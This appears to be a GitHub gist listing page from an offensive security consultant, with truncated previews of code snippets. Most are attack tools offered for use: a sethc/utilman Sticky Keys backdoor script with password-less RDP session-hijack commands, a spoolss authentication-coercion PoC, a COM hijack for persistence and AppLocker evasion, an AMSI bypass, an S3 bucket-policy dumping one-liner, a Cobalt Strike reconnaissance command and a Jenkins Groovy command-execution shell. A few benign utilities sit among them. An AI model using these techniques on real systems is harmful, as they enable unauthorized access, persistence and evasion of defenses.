Skip to content

Instantly share code, notes, and snippets.

Offensive Sencha Consultant

Mariusz B. mgeeky

Offensive Sencha Consultant
Block or report user

Report or block mgeeky

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
mgeeky / Decode-Base64.ps1
Last active Jun 20, 2019
Base64 Decode in Powershell
View Decode-Base64.ps1
function Decode-Base64Ascii ($data) {
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
$ss = "[^" + $chars + "=]"
$data = $data -replace $ss, ""
$pad = ""
$r = ""
if (($data[$data.Length - 1]) -eq '=') {
if (($data[$data.Length - 2]) -eq '=') {
$pad = "AA"
mgeeky / sethc-utilman-backdoor.bat
Last active Jun 19, 2019
Utilman and Sethc (Sticky keys) ready for use backdoor script. Deadly when used with "Password-less RDP Session Hijacking" trick
View sethc-utilman-backdoor.bat
@echo off
REM Backdoors sethc.exe (Sticky keys) and utilman (Win+U) in order to easily get past
REM Windows logon screen (GINA). These processes will launch as SYSTEM. We can use then
REM technique dubbed as "Password-less RDP Session Hijacking", by doing:
REM (parameters to tscon needs to be adjusted)
REM C:\> query user
REM C:\> sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console"
REM C:\> net start sesshijack
mgeeky /
Created Jun 14, 2019 — forked from 3xocyte/
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer:
# some code from
import os
import sys
import argparse
import binascii
import ConfigParser
mgeeky /
Created Jun 14, 2019 — forked from lanmaster53/
Burp Python Scripter scripts
from burp import IScanIssue
class CustomIssue(IScanIssue):
def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
self.HttpMessages=[BasePair] # list of HTTP Messages
self.HttpService=BasePair.getHttpService() # HTTP Service
self.Url=BasePair.getUrl() # Java URL
self.Confidence = Confidence # "Certain", "Firm" or "Tentative"
self.IssueBackground = IssueBackground # String or None
self.IssueDetail = IssueDetail # String or None
mgeeky / slmgr-com-hijack.reg
Last active Jul 13, 2019
Example presenting how to Hijack COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade Command Line logging and AppLocker
View slmgr-com-hijack.reg
Windows Registry Editor Version 5.00
mgeeky / Disable-Amsi.ps1
Last active Jun 14, 2019
Hash-Lookups based three most recent AMSI Bypasses, techniques 1 and 3 works at the moment (13.06.2019).
View Disable-Amsi.ps1
#requires -version 5
function New-InMemoryModule
[Parameter(Position = 0)]
$ModuleName = [Guid]::NewGuid().ToString()
mgeeky /
Created May 28, 2019
One-liner that dumps all of the S3 buckets from different regions and all their Bucket policies.
P=aws-profile; for region in `aws ec2 describe-regions --output text | cut -f3`; do for bucket in `aws --region $region --profile $P s3api list-buckets --query 'Buckets[*].Name' --output text | tr '\t' '\n'`; do aws --profile $P --region $region s3api get-bucket-policy --bucket $bucket --query 'Policy' --output text 2> /dev/null | jq '.' | tee $P-$bucket.json ; done ; done
View tmux-cheatsheet.markdown

tmux shortcuts & cheatsheet

start new:


start new with session name:

tmux new -s myname
mgeeky / cobaltstrike-argue-powershell.txt
Created Apr 26, 2019
CobaltStrike's argue command with parameters for "powershell" command.
View cobaltstrike-argue-powershell.txt
argue powershell Get-WmiObject -Class ccm_application -Namespace root\ccm\clientsdk -ComputerName (get-content C:\Windows\System32\drivers\etc\hosts) | Where-Object { ($_.InstallState -ne "Installed") -and ($_.ApplicabilityState -eq "Applicable") -and ($_.IsMachineTarget -eq $True) -and ($_.EvaluationState -ne 1)} | select FullName,__SERVER ; Get-WMIobject win32_networkadapterconfiguration | where {$_.IPEnabled -eq “True”} | Select-Object pscomputername,ipaddress,defaultipgateway,ipsubnet,dnsserversearchorder,winsprimaryserver | format-Table -Auto ; Get-EventLog -log system -newest 1000 | where-object {$_.eventid -eq '1074'} | format-table machinename, username, timegenerated -autosize
mgeeky / jenkins-groovy-script-shell.txt
Last active Jun 21, 2019
Jenkins Groovy Shell-providing script. To be used after passing authentication on http://IP:Port/script
View jenkins-groovy-script-shell.txt
def shell(String command) {
println command
def process = new ProcessBuilder(addShellPrefix(command))
.directory(new File('user.dir'))
process.inputStream.eachLine {println it}
return process.exitValue()
You can’t perform that action at this time.